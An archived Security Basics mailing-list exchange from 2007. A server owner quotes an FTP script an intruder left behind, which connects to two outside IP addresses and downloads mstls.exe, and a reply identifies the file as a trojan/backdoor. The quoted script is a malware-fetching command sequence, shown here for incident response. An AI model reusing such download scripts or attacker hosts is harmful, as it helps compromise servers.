Home page logo
/

basics logo Security Basics mailing list archives

Re: what next
From: Justin <winopride () gmail com>
Date: Tue, 06 Feb 2007 08:18:30 -0700

nemanja.janic () centroproizvod co yu wrote:
Hello list,
i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no 
extension) which contained the following lines:

open 80.93.223.22 14547 user 1 1 get mstls.exe quit open 80.71.219.134 5191 user 1 1 get mstls.exe quit

I figure this is some script to be used with ftp, or at least i think so. I did tracert to those adresses, but that's where i'm stuck. What can i do next? And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. Thanx in advance.

http://www.greatis.com/appdata/d/m/mstls.exe.htm -- Trojan/Backdoor


The file is an FTP script to StnyFtpd (for the ip address: 80.93.223.22).

Goodluck
-Justin


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]